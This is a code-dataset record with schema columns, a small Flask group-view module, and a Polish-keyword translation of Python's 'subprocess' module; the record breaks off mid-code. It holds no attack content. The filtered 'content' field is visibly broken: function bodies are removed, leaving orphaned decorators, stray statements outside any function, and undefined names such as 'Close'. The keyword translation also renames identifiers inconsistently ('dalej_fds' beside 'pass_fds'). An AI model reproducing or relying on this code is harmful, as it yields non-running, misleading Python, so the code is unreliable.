hexsha
stringlengths
40
40
size
int64
7
1.04M
ext
stringclasses
10 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
4
247
max_stars_repo_name
stringlengths
4
125
max_stars_repo_head_hexsha
stringlengths
40
78
max_stars_repo_licenses
listlengths
1
10
max_stars_count
int64
1
368k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
4
247
max_issues_repo_name
stringlengths
4
125
max_issues_repo_head_hexsha
stringlengths
40
78
max_issues_repo_licenses
listlengths
1
10
max_issues_count
int64
1
116k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
4
247
max_forks_repo_name
stringlengths
4
125
max_forks_repo_head_hexsha
stringlengths
40
78
max_forks_repo_licenses
listlengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
1
1.04M
avg_line_length
float64
1.77
618k
max_line_length
int64
1
1.02M
alphanum_fraction
float64
0
1
original_content
stringlengths
7
1.04M
filtered:remove_function_no_docstring
int64
-102
942k
filtered:remove_class_no_docstring
int64
-354
977k
filtered:remove_delete_markers
int64
0
60.1k
7489a928ee4ce01e0514e27f5339bfa54dd0436b
745
py
Python
idManager/view/group_view.py
lgarciasbr/idm-api
3517d29d55eb2a06fb5b4b21359b6cf6d11529a0
[ "Apache-2.0" ]
2
2018-01-14T22:43:43.000Z
2018-01-14T22:43:48.000Z
idManager/view/group_view.py
lgarciasbr/idm-api
3517d29d55eb2a06fb5b4b21359b6cf6d11529a0
[ "Apache-2.0" ]
null
null
null
idManager/view/group_view.py
lgarciasbr/idm-api
3517d29d55eb2a06fb5b4b21359b6cf6d11529a0
[ "Apache-2.0" ]
null
null
null
from flask import jsonify
24.833333
94
0.660403
from flask import jsonify def register_group(http_status_code, group, message): view = jsonify({'status_code': http_status_code, 'message': message, 'group': group.data}) return view def get_groups(groups, total, pages, http_status_code): view = jsonify({'groups': groups.data, 'total': total, 'pages': pages, 'status_code': http_status_code}) return view def get_group_by_id(http_status_code, group): view = jsonify({'status_code': http_status_code, 'group': group.data}) return view def delete_group(http_status_code, group, message): view = jsonify({'status_code': http_status_code, 'message': message, 'group': group.data}) return view
623
0
92
1f752fceba17b43584813efd37c1d1e243571d98
69,340
py
Python
Lib/subprocess.py
sireliah/polish-python
605df4944c2d3bc25f8bf6964b274c0a0d297cc3
[ "PSF-2.0" ]
1
2018-06-21T18:21:24.000Z
2018-06-21T18:21:24.000Z
Lib/subprocess.py
sireliah/polish-python
605df4944c2d3bc25f8bf6964b274c0a0d297cc3
[ "PSF-2.0" ]
null
null
null
Lib/subprocess.py
sireliah/polish-python
605df4944c2d3bc25f8bf6964b274c0a0d297cc3
[ "PSF-2.0" ]
null
null
null
# subprocess - Subprocesses przy accessible I/O streams # # For more information about this module, see PEP 324. # # Copyright (c) 2003-2005 by Peter Astrand <astrand@lysator.liu.se> # # Licensed to PSF under a Contributor Agreement. # See http://www.python.org/2.4/license dla licensing details. r"""subprocess - Subprocesses przy accessible I/O streams This module allows you to spawn processes, connect to their input/output/error pipes, oraz obtain their zwróć codes. This module intends to replace several older modules oraz functions: os.system os.spawn* Information about how the subprocess module can be used to replace these modules oraz functions can be found below. Using the subprocess module =========================== This module defines one klasa called Popen: klasa Popen(args, bufsize=-1, executable=Nic, stdin=Nic, stdout=Nic, stderr=Nic, preexec_fn=Nic, close_fds=Prawda, shell=Nieprawda, cwd=Nic, env=Nic, universal_newlines=Nieprawda, startupinfo=Nic, creationflags=0, restore_signals=Prawda, start_new_session=Nieprawda, dalej_fds=()): Arguments are: args should be a string, albo a sequence of program arguments. The program to execute jest normally the first item w the args sequence albo string, but can be explicitly set by using the executable argument. On POSIX, przy shell=Nieprawda (default): In this case, the Popen class uses os.execvp() to execute the child program. args should normally be a sequence. A string will be treated jako a sequence przy the string as the only item (the program to execute). On POSIX, przy shell=Prawda: If args jest a string, it specifies the command string to execute through the shell. If args jest a sequence, the first item specifies the command string, oraz any additional items will be treated jako additional shell arguments. On Windows: the Popen klasa uses CreateProcess() to execute the child program, which operates on strings. If args jest a sequence, it will be converted to a string using the list2cmdline method. Please note that not all MS Windows applications interpret the command line the same way: The list2cmdline jest designed dla applications using the same rules jako the MS C runtime. bufsize will be supplied jako the corresponding argument to the io.open() function when creating the stdin/stdout/stderr pipe file objects: 0 means unbuffered (read & write are one system call oraz can zwróć short), 1 means line buffered, any other positive value means use a buffer of approximately that size. A negative bufsize, the default, means the system default of io.DEFAULT_BUFFER_SIZE will be used. stdin, stdout oraz stderr specify the executed programs' standard input, standard output oraz standard error file handles, respectively. Valid values are PIPE, an existing file descriptor (a positive integer), an existing file object, oraz Nic. PIPE indicates that a new pipe to the child should be created. With Nic, no redirection will occur; the child's file handles will be inherited z the parent. Additionally, stderr can be STDOUT, which indicates that the stderr data z the applications should be captured into the same file handle jako dla stdout. On POSIX, jeżeli preexec_fn jest set to a callable object, this object will be called w the child process just before the child jest executed. The use of preexec_fn jest nie thread safe, using it w the presence of threads could lead to a deadlock w the child process before the new executable is executed. If close_fds jest true, all file descriptors wyjąwszy 0, 1 oraz 2 will be closed before the child process jest executed. The default dla close_fds varies by platform: Always true on POSIX. Prawda when stdin/stdout/stderr are Nic on Windows, false otherwise. pass_fds jest an optional sequence of file descriptors to keep open between the parent oraz child. Providing any dalej_fds implicitly sets close_fds to true. jeżeli shell jest true, the specified command will be executed through the shell. If cwd jest nie Nic, the current directory will be changed to cwd before the child jest executed. On POSIX, jeżeli restore_signals jest Prawda all signals that Python sets to SIG_IGN are restored to SIG_DFL w the child process before the exec. Currently this includes the SIGPIPE, SIGXFZ oraz SIGXFSZ signals. This parameter does nothing on Windows. On POSIX, jeżeli start_new_session jest Prawda, the setsid() system call will be made in the child process prior to executing the command. If env jest nie Nic, it defines the environment variables dla the new process. If universal_newlines jest Nieprawda, the file objects stdin, stdout oraz stderr are opened jako binary files, oraz no line ending conversion jest done. If universal_newlines jest Prawda, the file objects stdout oraz stderr are opened jako a text file, but lines may be terminated by any of '\n', the Unix end-of-line convention, '\r', the old Macintosh convention albo '\r\n', the Windows convention. All of these external representations are seen jako '\n' by the Python program. Also, the newlines attribute of the file objects stdout, stdin oraz stderr are nie updated by the communicate() method. In either case, the process being communicated przy should start up expecting to receive bytes on its standard input oraz decode them with the same encoding they are sent in. The startupinfo oraz creationflags, jeżeli given, will be dalejed to the underlying CreateProcess() function. They can specify things such as appearance of the main window oraz priority dla the new process. (Windows only) This module also defines some shortcut functions: call(*popenargs, **kwargs): Run command przy arguments. Wait dla command to complete, then zwróć the returncode attribute. The arguments are the same jako dla the Popen constructor. Example: >>> retcode = subprocess.call(["ls", "-l"]) check_call(*popenargs, **kwargs): Run command przy arguments. Wait dla command to complete. If the exit code was zero then return, otherwise podnieś CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute. The arguments are the same jako dla the Popen constructor. Example: >>> subprocess.check_call(["ls", "-l"]) 0 getstatusoutput(cmd): Return (status, output) of executing cmd w a shell. Execute the string 'cmd' w a shell przy 'check_output' oraz zwróć a 2-tuple (status, output). Universal newlines mode jest used, meaning that the result przy be decoded to a string. A trailing newline jest stripped z the output. The exit status dla the command can be interpreted according to the rules dla the function 'wait'. Example: >>> subprocess.getstatusoutput('ls /bin/ls') (0, '/bin/ls') >>> subprocess.getstatusoutput('cat /bin/junk') (256, 'cat: /bin/junk: No such file albo directory') >>> subprocess.getstatusoutput('/bin/junk') (256, 'sh: /bin/junk: nie found') getoutput(cmd): Return output (stdout albo stderr) of executing cmd w a shell. Like getstatusoutput(), wyjąwszy the exit status jest ignored oraz the zwróć value jest a string containing the command's output. Example: >>> subprocess.getoutput('ls /bin/ls') '/bin/ls' check_output(*popenargs, **kwargs): Run command przy arguments oraz zwróć its output. If the exit code was non-zero it podnieśs a CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute oraz output w the output attribute. The arguments are the same jako dla the Popen constructor. Example: >>> output = subprocess.check_output(["ls", "-l", "/dev/null"]) There jest an additional optional argument, "input", allowing you to dalej a string to the subprocess's stdin. If you use this argument you may nie also use the Popen constructor's "stdin" argument. If universal_newlines jest set to Prawda, the "input" argument must be a string rather than bytes, oraz the zwróć value will be a string. Exceptions ---------- Exceptions podnieśd w the child process, before the new program has started to execute, will be re-raised w the parent. Additionally, the exception object will have one extra attribute called 'child_traceback', which jest a string containing traceback information z the child's point of view. The most common exception podnieśd jest OSError. This occurs, for example, when trying to execute a non-existent file. Applications should prepare dla OSErrors. A ValueError will be podnieśd jeżeli Popen jest called przy invalid arguments. Exceptions defined within this module inherit z SubprocessError. check_call() oraz check_output() will podnieś CalledProcessError jeżeli the called process returns a non-zero zwróć code. TimeoutExpired be podnieśd jeżeli a timeout was specified oraz expired. Security -------- Unlike some other popen functions, this implementation will never call /bin/sh implicitly. This means that all characters, including shell metacharacters, can safely be dalejed to child processes. Popen objects ============= Instances of the Popen klasa have the following methods: poll() Check jeżeli child process has terminated. Returns returncode attribute. wait() Wait dla child process to terminate. Returns returncode attribute. communicate(input=Nic) Interact przy process: Send data to stdin. Read data z stdout oraz stderr, until end-of-file jest reached. Wait dla process to terminate. The optional input argument should be data to be sent to the child process, albo Nic, jeżeli no data should be sent to the child. If the Popen instance was constructed przy universal_newlines set to Prawda, the input argument should be a string oraz will be encoded using the preferred system encoding (see locale.getpreferredencoding); jeżeli universal_newlines jest Nieprawda, the input argument should be a byte string. communicate() returns a tuple (stdout, stderr). Note: The data read jest buffered w memory, so do nie use this method jeżeli the data size jest large albo unlimited. The following attributes are also available: stdin If the stdin argument jest PIPE, this attribute jest a file object that provides input to the child process. Otherwise, it jest Nic. stdout If the stdout argument jest PIPE, this attribute jest a file object that provides output z the child process. Otherwise, it jest Nic. stderr If the stderr argument jest PIPE, this attribute jest file object that provides error output z the child process. Otherwise, it jest Nic. pid The process ID of the child process. returncode The child zwróć code. A Nic value indicates that the process hasn't terminated yet. A negative value -N indicates that the child was terminated by signal N (POSIX only). Replacing older functions przy the subprocess module ==================================================== In this section, "a ==> b" means that b can be used jako a replacement dla a. Note: All functions w this section fail (more albo less) silently if the executed program cannot be found; this module podnieśs an OSError exception. In the following examples, we assume that the subprocess module jest imported przy "z subprocess zaimportuj *". Replacing /bin/sh shell backquote --------------------------------- output=`mycmd myarg` ==> output = Popen(["mycmd", "myarg"], stdout=PIPE).communicate()[0] Replacing shell pipe line ------------------------- output=`dmesg | grep hda` ==> p1 = Popen(["dmesg"], stdout=PIPE) p2 = Popen(["grep", "hda"], stdin=p1.stdout, stdout=PIPE) output = p2.communicate()[0] Replacing os.system() --------------------- sts = os.system("mycmd" + " myarg") ==> p = Popen("mycmd" + " myarg", shell=Prawda) pid, sts = os.waitpid(p.pid, 0) Note: * Calling the program through the shell jest usually nie required. * It's easier to look at the returncode attribute than the exitstatus. A more real-world example would look like this: spróbuj: retcode = call("mycmd" + " myarg", shell=Prawda) jeżeli retcode < 0: print("Child was terminated by signal", -retcode, file=sys.stderr) inaczej: print("Child returned", retcode, file=sys.stderr) wyjąwszy OSError jako e: print("Execution failed:", e, file=sys.stderr) Replacing os.spawn* ------------------- P_NOWAIT example: pid = os.spawnlp(os.P_NOWAIT, "/bin/mycmd", "mycmd", "myarg") ==> pid = Popen(["/bin/mycmd", "myarg"]).pid P_WAIT example: retcode = os.spawnlp(os.P_WAIT, "/bin/mycmd", "mycmd", "myarg") ==> retcode = call(["/bin/mycmd", "myarg"]) Vector example: os.spawnvp(os.P_NOWAIT, path, args) ==> Popen([path] + args[1:]) Environment example: os.spawnlpe(os.P_NOWAIT, "/bin/mycmd", "mycmd", "myarg", env) ==> Popen(["/bin/mycmd", "myarg"], env={"PATH": "/usr/bin"}) """ zaimportuj sys _mswindows = (sys.platform == "win32") zaimportuj io zaimportuj os zaimportuj time zaimportuj signal zaimportuj builtins zaimportuj warnings zaimportuj errno z time zaimportuj monotonic jako _time # Exception classes used by this module. klasa SubprocessError(Exception): dalej klasa CalledProcessError(SubprocessError): """This exception jest podnieśd when a process run by check_call() albo check_output() returns a non-zero exit status. The exit status will be stored w the returncode attribute; check_output() will also store the output w the output attribute. """ @property def stdout(self): """Alias dla output attribute, to match stderr""" zwróć self.output @stdout.setter klasa TimeoutExpired(SubprocessError): """This exception jest podnieśd when the timeout expires dopóki waiting dla a child process. """ @property @stdout.setter jeżeli _mswindows: zaimportuj threading zaimportuj msvcrt zaimportuj _winapi klasa STARTUPINFO: dwFlags = 0 hStdInput = Nic hStdOutput = Nic hStdError = Nic wShowWindow = 0 inaczej: zaimportuj _posixsubprocess zaimportuj select zaimportuj selectors spróbuj: zaimportuj threading wyjąwszy ImportError: zaimportuj dummy_threading jako threading # When select albo poll has indicated that the file jest writable, # we can write up to _PIPE_BUF bytes without risk of blocking. # POSIX defines PIPE_BUF jako >= 512. _PIPE_BUF = getattr(select, 'PIPE_BUF', 512) # poll/select have the advantage of nie requiring any extra file # descriptor, contrarily to epoll/kqueue (also, they require a single # syscall). jeżeli hasattr(selectors, 'PollSelector'): _PopenSelector = selectors.PollSelector inaczej: _PopenSelector = selectors.SelectSelector __all__ = ["Popen", "PIPE", "STDOUT", "call", "check_call", "getstatusoutput", "getoutput", "check_output", "run", "CalledProcessError", "DEVNULL", "SubprocessError", "TimeoutExpired", "CompletedProcess"] # NOTE: We intentionally exclude list2cmdline jako it jest # considered an internal implementation detail. issue10838. jeżeli _mswindows: z _winapi zaimportuj (CREATE_NEW_CONSOLE, CREATE_NEW_PROCESS_GROUP, STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE, SW_HIDE, STARTF_USESTDHANDLES, STARTF_USESHOWWINDOW) __all__.extend(["CREATE_NEW_CONSOLE", "CREATE_NEW_PROCESS_GROUP", "STD_INPUT_HANDLE", "STD_OUTPUT_HANDLE", "STD_ERROR_HANDLE", "SW_HIDE", "STARTF_USESTDHANDLES", "STARTF_USESHOWWINDOW"]) klasa Handle(int): closed = Nieprawda __del__ = Close __str__ = __repr__ # This lists holds Popen instances dla which the underlying process had nie # exited at the time its __del__ method got called: those processes are wait()ed # dla synchronously z _cleanup() when a new Popen object jest created, to avoid # zombie processes. _active = [] PIPE = -1 STDOUT = -2 DEVNULL = -3 # XXX This function jest only used by multiprocessing oraz the test suite, # but it's here so that it can be imported when Python jest compiled without # threads. args.append('-' + opt * v) dla opt w sys.warnoptions: args.append('-W' + opt) zwróć args def call(*popenargs, timeout=Nic, **kwargs): """Run command przy arguments. Wait dla command to complete albo timeout, then zwróć the returncode attribute. The arguments are the same jako dla the Popen constructor. Example: retcode = call(["ls", "-l"]) """ przy Popen(*popenargs, **kwargs) jako p: spróbuj: zwróć p.wait(timeout=timeout) wyjąwszy: p.kill() p.wait() podnieś def check_call(*popenargs, **kwargs): """Run command przy arguments. Wait dla command to complete. If the exit code was zero then return, otherwise podnieś CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute. The arguments are the same jako dla the call function. Example: check_call(["ls", "-l"]) """ retcode = call(*popenargs, **kwargs) jeżeli retcode: cmd = kwargs.get("args") jeżeli cmd jest Nic: cmd = popenargs[0] podnieś CalledProcessError(retcode, cmd) zwróć 0 def check_output(*popenargs, timeout=Nic, **kwargs): r"""Run command przy arguments oraz zwróć its output. If the exit code was non-zero it podnieśs a CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute oraz output w the output attribute. The arguments are the same jako dla the Popen constructor. Example: >>> check_output(["ls", "-l", "/dev/null"]) b'crw-rw-rw- 1 root root 1, 3 Oct 18 2007 /dev/null\n' The stdout argument jest nie allowed jako it jest used internally. To capture standard error w the result, use stderr=STDOUT. >>> check_output(["/bin/sh", "-c", ... "ls -l non_existent_file ; exit 0"], ... stderr=STDOUT) b'ls: non_existent_file: No such file albo directory\n' There jest an additional optional argument, "input", allowing you to dalej a string to the subprocess's stdin. If you use this argument you may nie also use the Popen constructor's "stdin" argument, as it too will be used internally. Example: >>> check_output(["sed", "-e", "s/foo/bar/"], ... input=b"when w the course of fooman events\n") b'when w the course of barman events\n' If universal_newlines=Prawda jest dalejed, the "input" argument must be a string oraz the zwróć value will be a string rather than bytes. """ jeżeli 'stdout' w kwargs: podnieś ValueError('stdout argument nie allowed, it will be overridden.') jeżeli 'input' w kwargs oraz kwargs['input'] jest Nic: # Explicitly dalejing input=Nic was previously equivalent to dalejing an # empty string. That jest maintained here dla backwards compatibility. kwargs['input'] = '' jeżeli kwargs.get('universal_newlines', Nieprawda) inaczej b'' zwróć run(*popenargs, stdout=PIPE, timeout=timeout, check=Prawda, **kwargs).stdout klasa CompletedProcess(object): """A process that has finished running. This jest returned by run(). Attributes: args: The list albo str args dalejed to run(). returncode: The exit code of the process, negative dla signals. stdout: The standard output (Nic jeżeli nie captured). stderr: The standard error (Nic jeżeli nie captured). """ def check_returncode(self): """Raise CalledProcessError jeżeli the exit code jest non-zero.""" jeżeli self.returncode: podnieś CalledProcessError(self.returncode, self.args, self.stdout, self.stderr) def run(*popenargs, input=Nic, timeout=Nic, check=Nieprawda, **kwargs): """Run command przy arguments oraz zwróć a CompletedProcess instance. The returned instance will have attributes args, returncode, stdout oraz stderr. By default, stdout oraz stderr are nie captured, oraz those attributes will be Nic. Pass stdout=PIPE and/or stderr=PIPE w order to capture them. If check jest Prawda oraz the exit code was non-zero, it podnieśs a CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute, oraz output & stderr attributes jeżeli those streams were captured. If timeout jest given, oraz the process takes too long, a TimeoutExpired exception will be podnieśd. There jest an optional argument "input", allowing you to dalej a string to the subprocess's stdin. If you use this argument you may nie also use the Popen constructor's "stdin" argument, as it will be used internally. The other arguments are the same jako dla the Popen constructor. If universal_newlines=Prawda jest dalejed, the "input" argument must be a string oraz stdout/stderr w the returned object will be strings rather than bytes. """ jeżeli input jest nie Nic: jeżeli 'stdin' w kwargs: podnieś ValueError('stdin oraz input arguments may nie both be used.') kwargs['stdin'] = PIPE przy Popen(*popenargs, **kwargs) jako process: spróbuj: stdout, stderr = process.communicate(input, timeout=timeout) wyjąwszy TimeoutExpired: process.kill() stdout, stderr = process.communicate() podnieś TimeoutExpired(process.args, timeout, output=stdout, stderr=stderr) wyjąwszy: process.kill() process.wait() podnieś retcode = process.poll() jeżeli check oraz retcode: podnieś CalledProcessError(retcode, process.args, output=stdout, stderr=stderr) zwróć CompletedProcess(process.args, retcode, stdout, stderr) def list2cmdline(seq): """ Translate a sequence of arguments into a command line string, using the same rules jako the MS C runtime: 1) Arguments are delimited by white space, which jest either a space albo a tab. 2) A string surrounded by double quotation marks jest interpreted jako a single argument, regardless of white space contained within. A quoted string can be embedded w an argument. 3) A double quotation mark preceded by a backslash jest interpreted jako a literal double quotation mark. 4) Backslashes are interpreted literally, unless they immediately precede a double quotation mark. 5) If backslashes immediately precede a double quotation mark, every pair of backslashes jest interpreted jako a literal backslash. If the number of backslashes jest odd, the last backslash escapes the next double quotation mark as described w rule 3. """ # See # http://msdn.microsoft.com/en-us/library/17w5ykft.aspx # albo search http://msdn.microsoft.com for # "Parsing C++ Command-Line Arguments" result = [] needquote = Nieprawda dla arg w seq: bs_buf = [] # Add a space to separate this argument z the others jeżeli result: result.append(' ') needquote = (" " w arg) albo ("\t" w arg) albo nie arg jeżeli needquote: result.append('"') dla c w arg: jeżeli c == '\\': # Don't know jeżeli we need to double yet. bs_buf.append(c) albo_inaczej c == '"': # Double backslashes. result.append('\\' * len(bs_buf)*2) bs_buf = [] result.append('\\"') inaczej: # Normal char jeżeli bs_buf: result.extend(bs_buf) bs_buf = [] result.append(c) # Add remaining backslashes, jeżeli any. jeżeli bs_buf: result.extend(bs_buf) jeżeli needquote: result.extend(bs_buf) result.append('"') zwróć ''.join(result) # Various tools dla executing commands oraz looking at their output oraz status. # zwróć status, data def getoutput(cmd): """Return output (stdout albo stderr) of executing cmd w a shell. Like getstatusoutput(), wyjąwszy the exit status jest ignored oraz the zwróć value jest a string containing the command's output. Example: >>> zaimportuj subprocess >>> subprocess.getoutput('ls /bin/ls') '/bin/ls' """ zwróć getstatusoutput(cmd)[1] _PLATFORM_DEFAULT_CLOSE_FDS = object() klasa Popen(object): _child_created = Nieprawda # Set here since __del__ checks it jeżeli _mswindows: jeżeli preexec_fn jest nie Nic: podnieś ValueError("preexec_fn jest nie supported on Windows " "platforms") any_stdio_set = (stdin jest nie Nic albo stdout jest nie Nic albo stderr jest nie Nic) jeżeli close_fds jest _PLATFORM_DEFAULT_CLOSE_FDS: jeżeli any_stdio_set: close_fds = Nieprawda inaczej: close_fds = Prawda albo_inaczej close_fds oraz any_stdio_set: podnieś ValueError( "close_fds jest nie supported on Windows platforms" " jeżeli you redirect stdin/stdout/stderr") inaczej: # POSIX jeżeli close_fds jest _PLATFORM_DEFAULT_CLOSE_FDS: close_fds = Prawda jeżeli dalej_fds oraz nie close_fds: warnings.warn("pass_fds overriding close_fds.", RuntimeWarning) close_fds = Prawda jeżeli startupinfo jest nie Nic: podnieś ValueError("startupinfo jest only supported on Windows " "platforms") jeżeli creationflags != 0: podnieś ValueError("creationflags jest only supported on Windows " "platforms") self.args = args self.stdin = Nic self.stdout = Nic self.stderr = Nic self.pid = Nic self.returncode = Nic self.universal_newlines = universal_newlines # Input oraz output objects. The general principle jest like # this: # # Parent Child # ------ ----- # p2cwrite ---stdin---> p2cread # c2pread <--stdout--- c2pwrite # errread <--stderr--- errwrite # # On POSIX, the child objects are file descriptors. On # Windows, these are Windows file handles. The parent objects # are file descriptors on both platforms. The parent objects # are -1 when nie using PIPEs. The child objects are -1 # when nie redirecting. (p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) = self._get_handles(stdin, stdout, stderr) # We wrap OS handles *before* launching the child, otherwise a # quickly terminating child could make our fds unwrappable # (see #8458). jeżeli _mswindows: jeżeli p2cwrite != -1: p2cwrite = msvcrt.open_osfhandle(p2cwrite.Detach(), 0) jeżeli c2pread != -1: c2pread = msvcrt.open_osfhandle(c2pread.Detach(), 0) jeżeli errread != -1: errread = msvcrt.open_osfhandle(errread.Detach(), 0) jeżeli p2cwrite != -1: self.stdin = io.open(p2cwrite, 'wb', bufsize) jeżeli universal_newlines: self.stdin = io.TextIOWrapper(self.stdin, write_through=Prawda, line_buffering=(bufsize == 1)) jeżeli c2pread != -1: self.stdout = io.open(c2pread, 'rb', bufsize) jeżeli universal_newlines: self.stdout = io.TextIOWrapper(self.stdout) jeżeli errread != -1: self.stderr = io.open(errread, 'rb', bufsize) jeżeli universal_newlines: self.stderr = io.TextIOWrapper(self.stderr) self._closed_child_pipe_fds = Nieprawda spróbuj: self._execute_child(args, executable, preexec_fn, close_fds, dalej_fds, cwd, env, startupinfo, creationflags, shell, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, restore_signals, start_new_session) wyjąwszy: # Cleanup jeżeli the child failed starting. dla f w filter(Nic, (self.stdin, self.stdout, self.stderr)): spróbuj: f.close() wyjąwszy OSError: dalej # Ignore EBADF albo other errors. jeżeli nie self._closed_child_pipe_fds: to_close = [] jeżeli stdin == PIPE: to_close.append(p2cread) jeżeli stdout == PIPE: to_close.append(c2pwrite) jeżeli stderr == PIPE: to_close.append(errwrite) jeżeli hasattr(self, '_devnull'): to_close.append(self._devnull) dla fd w to_close: spróbuj: os.close(fd) wyjąwszy OSError: dalej podnieś zwróć self._devnull def _stdin_write(self, input): jeżeli input: spróbuj: self.stdin.write(input) wyjąwszy BrokenPipeError: # communicate() must ignore broken pipe error dalej wyjąwszy OSError jako e: jeżeli e.errno == errno.EINVAL oraz self.poll() jest nie Nic: # Issue #19612: On Windows, stdin.write() fails przy EINVAL # jeżeli the process already exited before the write dalej inaczej: podnieś self.stdin.close() def communicate(self, input=Nic, timeout=Nic): """Interact przy process: Send data to stdin. Read data from stdout oraz stderr, until end-of-file jest reached. Wait for process to terminate. The optional "input" argument should be data to be sent to the child process (jeżeli self.universal_newlines jest Prawda, this should be a string; jeżeli it jest Nieprawda, "input" should be bytes), albo Nic, jeżeli no data should be sent to the child. communicate() returns a tuple (stdout, stderr). These will be bytes or, jeżeli self.universal_newlines was Prawda, a string. """ jeżeli self._communication_started oraz input: podnieś ValueError("Cannot send input after starting communication") # Optimization: If we are nie worried about timeouts, we haven't # started communicating, oraz we have one albo zero pipes, using select() # albo threads jest unnecessary. jeżeli (timeout jest Nic oraz nie self._communication_started oraz [self.stdin, self.stdout, self.stderr].count(Nic) >= 2): stdout = Nic stderr = Nic jeżeli self.stdin: self._stdin_write(input) albo_inaczej self.stdout: stdout = self.stdout.read() self.stdout.close() albo_inaczej self.stderr: stderr = self.stderr.read() self.stderr.close() self.wait() inaczej: jeżeli timeout jest nie Nic: endtime = _time() + timeout inaczej: endtime = Nic spróbuj: stdout, stderr = self._communicate(input, endtime, timeout) w_końcu: self._communication_started = Prawda sts = self.wait(timeout=self._remaining_time(endtime)) zwróć (stdout, stderr) def poll(self): zwróć self._internal_poll() def _remaining_time(self, endtime): """Convenience dla _communicate when computing timeouts.""" jeżeli endtime jest Nic: zwróć Nic inaczej: zwróć endtime - _time() def _check_timeout(self, endtime, orig_timeout): """Convenience dla checking jeżeli a timeout has expired.""" jeżeli endtime jest Nic: zwróć jeżeli _time() > endtime: podnieś TimeoutExpired(self.args, orig_timeout) jeżeli _mswindows: # # Windows methods # def _get_handles(self, stdin, stdout, stderr): """Construct oraz zwróć tuple przy IO objects: p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite """ jeżeli stdin jest Nic oraz stdout jest Nic oraz stderr jest Nic: zwróć (-1, -1, -1, -1, -1, -1) p2cread, p2cwrite = -1, -1 c2pread, c2pwrite = -1, -1 errread, errwrite = -1, -1 jeżeli stdin jest Nic: p2cread = _winapi.GetStdHandle(_winapi.STD_INPUT_HANDLE) jeżeli p2cread jest Nic: p2cread, _ = _winapi.CreatePipe(Nic, 0) p2cread = Handle(p2cread) _winapi.CloseHandle(_) albo_inaczej stdin == PIPE: p2cread, p2cwrite = _winapi.CreatePipe(Nic, 0) p2cread, p2cwrite = Handle(p2cread), Handle(p2cwrite) albo_inaczej stdin == DEVNULL: p2cread = msvcrt.get_osfhandle(self._get_devnull()) albo_inaczej isinstance(stdin, int): p2cread = msvcrt.get_osfhandle(stdin) inaczej: # Assuming file-like object p2cread = msvcrt.get_osfhandle(stdin.fileno()) p2cread = self._make_inheritable(p2cread) jeżeli stdout jest Nic: c2pwrite = _winapi.GetStdHandle(_winapi.STD_OUTPUT_HANDLE) jeżeli c2pwrite jest Nic: _, c2pwrite = _winapi.CreatePipe(Nic, 0) c2pwrite = Handle(c2pwrite) _winapi.CloseHandle(_) albo_inaczej stdout == PIPE: c2pread, c2pwrite = _winapi.CreatePipe(Nic, 0) c2pread, c2pwrite = Handle(c2pread), Handle(c2pwrite) albo_inaczej stdout == DEVNULL: c2pwrite = msvcrt.get_osfhandle(self._get_devnull()) albo_inaczej isinstance(stdout, int): c2pwrite = msvcrt.get_osfhandle(stdout) inaczej: # Assuming file-like object c2pwrite = msvcrt.get_osfhandle(stdout.fileno()) c2pwrite = self._make_inheritable(c2pwrite) jeżeli stderr jest Nic: errwrite = _winapi.GetStdHandle(_winapi.STD_ERROR_HANDLE) jeżeli errwrite jest Nic: _, errwrite = _winapi.CreatePipe(Nic, 0) errwrite = Handle(errwrite) _winapi.CloseHandle(_) albo_inaczej stderr == PIPE: errread, errwrite = _winapi.CreatePipe(Nic, 0) errread, errwrite = Handle(errread), Handle(errwrite) albo_inaczej stderr == STDOUT: errwrite = c2pwrite albo_inaczej stderr == DEVNULL: errwrite = msvcrt.get_osfhandle(self._get_devnull()) albo_inaczej isinstance(stderr, int): errwrite = msvcrt.get_osfhandle(stderr) inaczej: # Assuming file-like object errwrite = msvcrt.get_osfhandle(stderr.fileno()) errwrite = self._make_inheritable(errwrite) zwróć (p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) def _make_inheritable(self, handle): """Return a duplicate of handle, which jest inheritable""" h = _winapi.DuplicateHandle( _winapi.GetCurrentProcess(), handle, _winapi.GetCurrentProcess(), 0, 1, _winapi.DUPLICATE_SAME_ACCESS) zwróć Handle(h) def _execute_child(self, args, executable, preexec_fn, close_fds, dalej_fds, cwd, env, startupinfo, creationflags, shell, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, unused_restore_signals, unused_start_new_session): """Execute program (MS Windows version)""" assert nie dalej_fds, "pass_fds nie supported on Windows." jeżeli nie isinstance(args, str): args = list2cmdline(args) # Process startup details jeżeli startupinfo jest Nic: startupinfo = STARTUPINFO() jeżeli -1 nie w (p2cread, c2pwrite, errwrite): startupinfo.dwFlags |= _winapi.STARTF_USESTDHANDLES startupinfo.hStdInput = p2cread startupinfo.hStdOutput = c2pwrite startupinfo.hStdError = errwrite jeżeli shell: startupinfo.dwFlags |= _winapi.STARTF_USESHOWWINDOW startupinfo.wShowWindow = _winapi.SW_HIDE comspec = os.environ.get("COMSPEC", "cmd.exe") args = '{} /c "{}"'.format (comspec, args) # Start the process spróbuj: hp, ht, pid, tid = _winapi.CreateProcess(executable, args, # no special security Nic, Nic, int(nie close_fds), creationflags, env, cwd, startupinfo) w_końcu: # Child jest launched. Close the parent's copy of those pipe # handles that only the child should have open. You need # to make sure that no handles to the write end of the # output pipe are maintained w this process albo inaczej the # pipe will nie close when the child process exits oraz the # ReadFile will hang. jeżeli p2cread != -1: p2cread.Close() jeżeli c2pwrite != -1: c2pwrite.Close() jeżeli errwrite != -1: errwrite.Close() jeżeli hasattr(self, '_devnull'): 